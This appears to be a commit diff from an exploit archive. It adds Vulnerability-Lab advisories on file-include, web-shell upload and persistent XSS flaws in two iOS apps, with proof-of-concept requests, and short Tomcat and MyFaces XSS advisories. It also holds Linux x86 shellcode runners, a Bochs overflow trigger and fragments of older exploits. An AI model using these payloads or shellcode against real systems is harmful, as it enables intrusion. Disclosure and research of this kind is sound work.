Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

297
platforms/hardware/webapps/30146.txt Executable file
View file

@ -0,0 +1,297 @@
Document Title:
===============
Print n Share v5.5 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1154
Release Date:
=============
2013-12-06
Vulnerability Laboratory ID (VL-ID):
====================================
1154
Common Vulnerability Scoring System:
====================================
9.2
Product & Service Introduction:
===============================
Print directly to the widest range of network or WiFi printers, without a computer or AirPrint! Alternatively print
via your Mac/PC to ALL printers including USB & Bluetooth printers. Print... documents cloud files,web pages,emails,
attachments, photos, contacts, calendars, clipboard items, convert to PDF and much more - to ANY PRINTER!
(Copy of the Homepage: https://itunes.apple.com/en/app/print-n-share-der-all-in-one/id301656026
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Print n Share v5.5 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
EuroSmartz Ltd
Product: Print n Share 5.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
The remote file include web vulnerability is located in the import file module in the filename value. Remote attackers can inject own files or
path requests by adding regular text files (add). It is also possible to use the `rename` or `import` function to inject. The file include and
path request execute occurs in the main file dir index or subcategory listing of the mobile application. The security risk of the local file
include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.4(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.
Request Method(s):
[+] [POST]
Vulnerable Inputs(s):
[+] Neue Text Datei (New Text File)
[+] Umbenennen File (Rename File)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the import file module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 7.8(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Import
Vulnerable Inputs(s):
[+] Importieren - File > Sync
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] File Path Listing (http://localhost:8080)
1.3
A persistent input validation web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
The persistent input validation vulnerability is located in the Ordername (foldername) value of the print n share mobile web-application.
The exploitation can be done by usage of the local standard iOS pictures or video (default) app. Attackers rename the local device photo
or video foldername.The persistent execute occurs in the listed folder of the web-server interface (http://localhost:8080). Remote attackers
can also change the foldername by usage of the application to exploit (inject) via POST method own script code with persistent attack vector.
The vulnerable input are the `Ordername`(folder name), `Neuer Order` (new folder) and `Order Umbenennen` (folder rename). The security risk
of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+).
Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Ordnername - (Foldername)
[+] Neuer Ordner - (New Folder)
[+] Ordner Umbenennen - (Rename Folder)
Vulnerable Parameter(s):
[+] foldername - (path)
Affected Module(s):
[+] File Dir List
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by remote attackers without user interaction and also without privileged
web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>"</[LOCAL FILE INCLUDE WEB VULNERABILITY!]">.php
PoC Source: Local File Include Vulnerability - Filename
<html><head>
<title>/</title>
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
</head>
<body>
<h2>?/</h2><br><a href="/Clip-Archiv/">Clip-Archiv/</a>
<br>X<a href="/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>"</[LOCAL FILE INCLUDE WEB VULNERABILITY!]">.php</a>
<br><a href="/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">[LOCAL FILE INCLUDE WEB VULNERABILITY!].txt</a>
</body>
<html>
</iframe></a></body></html>
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without user interaction and also without privileged
web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/[file to path]">X>"<<>"</[ARBITRARY FILE UPLOAD WEB VULNERABILITY!]">.jpg.gif..html.js.php.gif.jpg
PoC Source: Arbitrary File Upload Vulnerability - Filename
<html><head>
<title>/</title>
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
</head>
<body>
<h2>?/</h2><br><a href="/Clip-Archiv/">Clip-Archiv/</a>
<br>X<a href="/[file]">X>"<<>"</[ARBITRARY FILE UPLOAD WEB VULNERABILITY!]">.jpg.gif..html.js.php.gif.jpg</a>
<br><a href="/[file]">[ARBITRARY FILE UPLOAD WEB VULNERABILITY!].jpg.gif..html.js.php.gif.jpg</a>
</body>
<html>
</iframe></a></body></html>
Reference(s):
http://localhost:8080/
1.3
The persistent input validation vulnerability can be exploited by remote attackers without privileged web-application user account
and with low user interaction. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/">
PoC Source: Persistent Input Validation Vulnerability - Ordnername (Foldername)
<body>
<h2>?/</h2><br><a href="http://localhost:8080/Clip-Archiv/">Clip-Archiv/</a>
<br><a href="http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/">>"
<<>"<[PERSISTENT INJECTED SCRIPT CODE!]">/</a>
<br><a href="/Schnellstart.txt">Schnellstart.txt</a>
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure encode and parse of the filename and the connected path value.
1.2
to fix the arbitrary file upload vulnerability it is required to restrict with a filter mechanism the filename extensions.
Disallow multiple extensions and setup and own exception-handling to prevent arbitrary file uploads and restricted file upload bypass.
1.3
To patch the persistent input validation web vulnerability parse and encode the `Ordername` (foldername) input values
in the import, add and rename function.
Filter and encode also the vulnerable output section of the malicious injected test values.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.4(+).
1.2
The security risk of the arbitrary file upload and upload restriction bypass vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.8(+).
1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

347
platforms/hardware/webapps/30215.txt Executable file
View file

@ -0,0 +1,347 @@
Document Title:
===============
Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1166
Release Date:
=============
2013-12-10
Vulnerability Laboratory ID (VL-ID):
====================================
1166
Common Vulnerability Scoring System:
====================================
8.8
Product & Service Introduction:
===============================
Download the photos & videos from your iPhones Library to computer / PC;Upload photos & videos from your computer;
Transfer photos in full resolution in *.png, *.jpg, *.zip formats;No limit of the number, size or quality of the
transferred photos;Photo Video Album Transfer is a multifunctional and easy-to-use app. It allows to transfer
photos and videos from iPhone to iPhone, from iPhone to computer and reverse. Now you can easily manage your
photo or video transfer and forget about cables, additional hardware and expensive programs. Transfer any number
of photos and videos using this irreplaceable application for iPhone.
(Copy of the Homepage: https://itunes.apple.com/en/app/photo-video-album-transfer/id682294794 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Photo Video Album Transfer - Mobile Application (Igor Ciobanu) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
The remote file include web vulnerability is located in the vulnerable filename value of the iOS Transfer Utility (web interface) module.
Remote attackers can manipulate the filename value in the POST method request of the browse file upload form to cpmpromise the mobile app.
Remote attackers are able to include own local files by usage of the browse file upload module. The attack vecotor is persistent and the
request method is POST. The file include execute occcurs in the main file dir index list were the filenames are visible listed. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Browse File Upload - File send & arrival (web interface)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.7(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Browse File Upload - File send & arrival (web interface)
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability in the file name can be exploited by remote attackers without user interaction or privileged mobile
web-application user account. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
Module: Upload
Input: Browse File
Method: POST
Manual stepst to reproduce the vulnerability ...
1. Install and start the vulnerable mobile application
2. Open the web-server wifi transfer (localhost:8080)
Note: Start to tamper the browser (http) request and response session of the next POST Request
3. Click the browse file to upload button and choose a random file of your local hd
4. Change in the POST method request of the upload the filename value and inject your own webshell, remote- or local file
5. The execute after the inject occurs in the main index file dir listing of the iOS Transfer Utility
6. Successful reproduce of the remote vulnerability!
PoC: Index File Dir List - iOS Transfer Utulity (filename)
<input name="file[]" accept="image/jpeg, image/png, video/quicktime, video/x-msvideo, video/x-m4v,
video/mp4" multiple="" type="file"></label><label><input name="button" id="button" value="Submit" type="submit"></label></form><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3"> <a href=".."><b> Refresh</b></a><br><br></td></tr>
<tr><td> <%20../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]"></td><td> 0.1 Kb</td><td>08.12.2013 15:58</td></tr>
<tr style='height: 180px;'><td style="text-align: center;" > <a href="IMG_0556_th.png"><img src="IMG_0556_th.png"
height="110px" style="max-width: 110px"><br>IMG_0556_th.png</a><br> 2.9 Kb</td>
</table>
<input type="hidden" value="numberOfAvailableFiles=IMG_0556_th.png,endOFF"/><br>
</div>
</body></html></iframe></td></tr></tbody></table></div></body></html>
--- PoC Session Request Logs ---
Status: 200[OK]
POST http://192.168.2.106:8080/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[59002] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Post Data:
POST_DATA[-----------------------------1863134445217
Content-Disposition: form-data; name="file[]"; filename="<../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]>"
Content-Type: image/png

Status: 200 OK
GET http://192.168.2.106:8080/a Load Flags[LOAD_DOCUMENT_URI ]
Content Size[0] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[So., 08 Dez. 2013 14:58:35 GMT]
1.2
The arbitrary file upload and restricted upload bypass vulnerability can be exploited by remote attackers without privileged web-application
user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
PoC:
<body><div class="header" id="header">
</div>
<div class="container" id="container"><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3"> <a href=".."><b> Refresh</b></a><br><br>
</td></tr><tr style="height: 180px;">
<td style="text-align: center;"> <a href="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]">
<img src="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]>"
style="max-width: 110px" height="110px"><br><iframe src="a"></a><br> 0.1 Kb</td>
<td style="text-align: center;" > <a href="IMG_0441.MOV"><img src="IMG_0441_th.png" height="110px" style="max-width: 110px">
<br>IMG_0441.MOV</a><br>657665.1 Kb</td>
</table>
--- PoC Session Logs ---
Status: 200[OK]
GET http://192.168.2.106:8080/
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[58702] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[58702]
Date[So., 08 Dez. 2013 15:34:33 GMT]
16:30:12.476[313ms][total 313ms]
Status: 200[OK]
GET http://192.168.2.106:8080/file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]
Load Flags[VALIDATE_ALWAYS ]
Content Size[124] Mime Type[:image/jpeg]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Content-Disposition[:attachment; filename="file.jpg.gif.js.html.php.gif.jpg"]
Content-Length[124]
Accept-Ranges[bytes]
Content-Type[:image/jpeg]
Date[So., 08 Dez. 2013 15:34:33 GMT]
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure filter mechanism and exception-handlign to prevent code execution via
filename value.
1.2
Restrict and filter the filename input value in the upload POST method request to ensure the right format is attached.
Restrict the image file access right to view only ;)
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical because of the location in the main filename value.
1.2
The security risk of the arbitrary file upload web vulnerability and restricted upload bypass bug is estimated high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

7
platforms/jsp/webapps/30189.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24476/info
Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http:/;www.example.com/jsp-examples/snp/snoop.jsp;[xss]

7
platforms/jsp/webapps/30191.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24480/info
Apache Tomahawk MyFaces JSF Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to launch cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http:/;www.example.com/some_app.jsf?autoscroll=[javascript]

34
platforms/lin_x86/shellcode/13394.c
View file

@ -1,18 +1,18 @@
/*
* (linux/x86) normal exit w/ random (so to speak) return value - 5 bytes
* - izik <izik@tty64.org>
*/
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\xcd\x80"; // int $0x80
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
/*
* (linux/x86) normal exit w/ random (so to speak) return value - 5 bytes
* - izik <izik@tty64.org>
*/
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\xcd\x80"; // int $0x80
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
// milw0rm.com [2006-01-21]

72
platforms/lin_x86/shellcode/13407.c
View file

@ -1,37 +1,37 @@
/* writehello-core.c by Charles Stevenson <core@bokeoa.com>
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it to see if my dup2_loop worked. If you don't
* get "Hello core!\n" back it's a good indicator your shell won't
* be functional the way you'd like.
*/
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb" // xor %ecx,%ecx
"\xf7\xe3" // mul %ecx
"\x53" // push %ecx
"\x68\x72\x65\x21\x0a" // push $0xa216572
"\x68\x6f\x20\x63\x6f" // push $0x6f63206f
"\x68\x48\x65\x6c\x6c" // push $0x6c6c6548
"\xb2\x0c" // mov $0xc,%dl
"\x43" // inc %ebx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
// not needed.. makes it exit cleanly
// 7 bytes _exit(1) ... 'cause we're nice >:) by core
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
strlen(hellcode));
shell();
return 0;
}
/* writehello-core.c by Charles Stevenson <core@bokeoa.com>
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it to see if my dup2_loop worked. If you don't
* get "Hello core!\n" back it's a good indicator your shell won't
* be functional the way you'd like.
*/
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb" // xor %ecx,%ecx
"\xf7\xe3" // mul %ecx
"\x53" // push %ecx
"\x68\x72\x65\x21\x0a" // push $0xa216572
"\x68\x6f\x20\x63\x6f" // push $0x6f63206f
"\x68\x48\x65\x6c\x6c" // push $0x6c6c6548
"\xb2\x0c" // mov $0xc,%dl
"\x43" // inc %ebx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
// not needed.. makes it exit cleanly
// 7 bytes _exit(1) ... 'cause we're nice >:) by core
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
strlen(hellcode));
shell();
return 0;
}
// milw0rm.com [2005-11-09]

23
platforms/linux/dos/30110.c Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/24246/info
Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation.
A local attacker can exploit these issues to execute arbitrary code in the context of the affected application or to cause denial-of-service conditions. Failed exploit attempts of the buffer-overflow vulnerability will also result in denial-of-service conditions.
#include <sys/io.h>
int main(int argc, char **argv) {
iopl(3);
outw(0x5292, 0x24c);
outw(0xffff, 0x245);(a)
outw(0x1ffb, 0x24e);
outb(0x76, 0x241);
outb(0x7b, 0x240);
outw(0x79c4, 0x247);
outw(0x59e6, 0x240);
return 0;
}
(a) <- TXCNT is inserted here.

6
platforms/linux/dos/691.c
View file

@ -77,6 +77,6 @@ close(s);
free(cmsg);
}
return 42;
}
// milw0rm.com [2004-12-16]
}
// milw0rm.com [2004-12-16]

6
platforms/linux/local/31.pl
View file

@ -74,6 +74,6 @@
$buffer2 .= $fmtstring;
exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
# milw0rm.com [2003-05-14]
# milw0rm.com [2003-05-14]

6
platforms/linux/local/394.c
View file

@ -323,6 +323,6 @@ int main(int argc, char *argv[]) {
}
// milw0rm.com [2004-08-13]
// milw0rm.com [2004-08-13]

6
platforms/linux/local/93.c
View file

@ -155,6 +155,6 @@ int cookthis() {
}
// milw0rm.com [2003-09-09]
// milw0rm.com [2003-09-09]

6
platforms/linux/remote/132.c
View file

@ -299,6 +299,6 @@ fclose(logfile);
}
}
/* m00 */
// milw0rm.com [2003-12-06]
/* m00 */
// milw0rm.com [2003-12-06]

7
platforms/linux/remote/30142.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24291/info
GDB is prone to a buffer-overflow vulnerability because it fails to properly check bounds when handling specially crafted executable files.
Attackers could leverage this issue to run arbitrary code outside of a restricted environment, which may lead to privilege escalation. Symantec has not confirmed code execution.
http://www.exploit-db.com/sploits/30142.zip

27
platforms/linux/remote/30186.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/24436/info
Firebird SQL is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary machine code in the context of the affected database server. Failed exploit attempts will likely crash the server, denying service to legitimate users.
Firebird SQL 2.0 is vulnerable; previous versions may also be affected.
typedef struct p_cnct
{
P_OP p_cnct_operation; /* OP_CREATE or OP_OPEN */
USHORT p_cnct_cversion; /* Version of connect protocol */
P_ARCH p_cnct_client; /* Architecture of client */
CSTRING p_cnct_file; /* File name */
USHORT p_cnct_count; /* Protocol versions understood */
CSTRING p_cnct_user_id; /* User identification stuff */
struct p_cnct_repeat
{
USHORT p_cnct_version; /* Protocol version number */
P_ARCH p_cnct_architecture; /* Architecture of client */
USHORT p_cnct_min_type; /* Minimum type */
USHORT p_cnct_max_type; /* Maximum type */
USHORT p_cnct_weight; /* Preference weight */
}
p_cnct_versions[10];
} P_CNCT;

6
platforms/linux/remote/304.c
View file

@ -154,6 +154,6 @@ return buffer;
main(int argc, char **argv)
{
talk(IP, "cool");
}
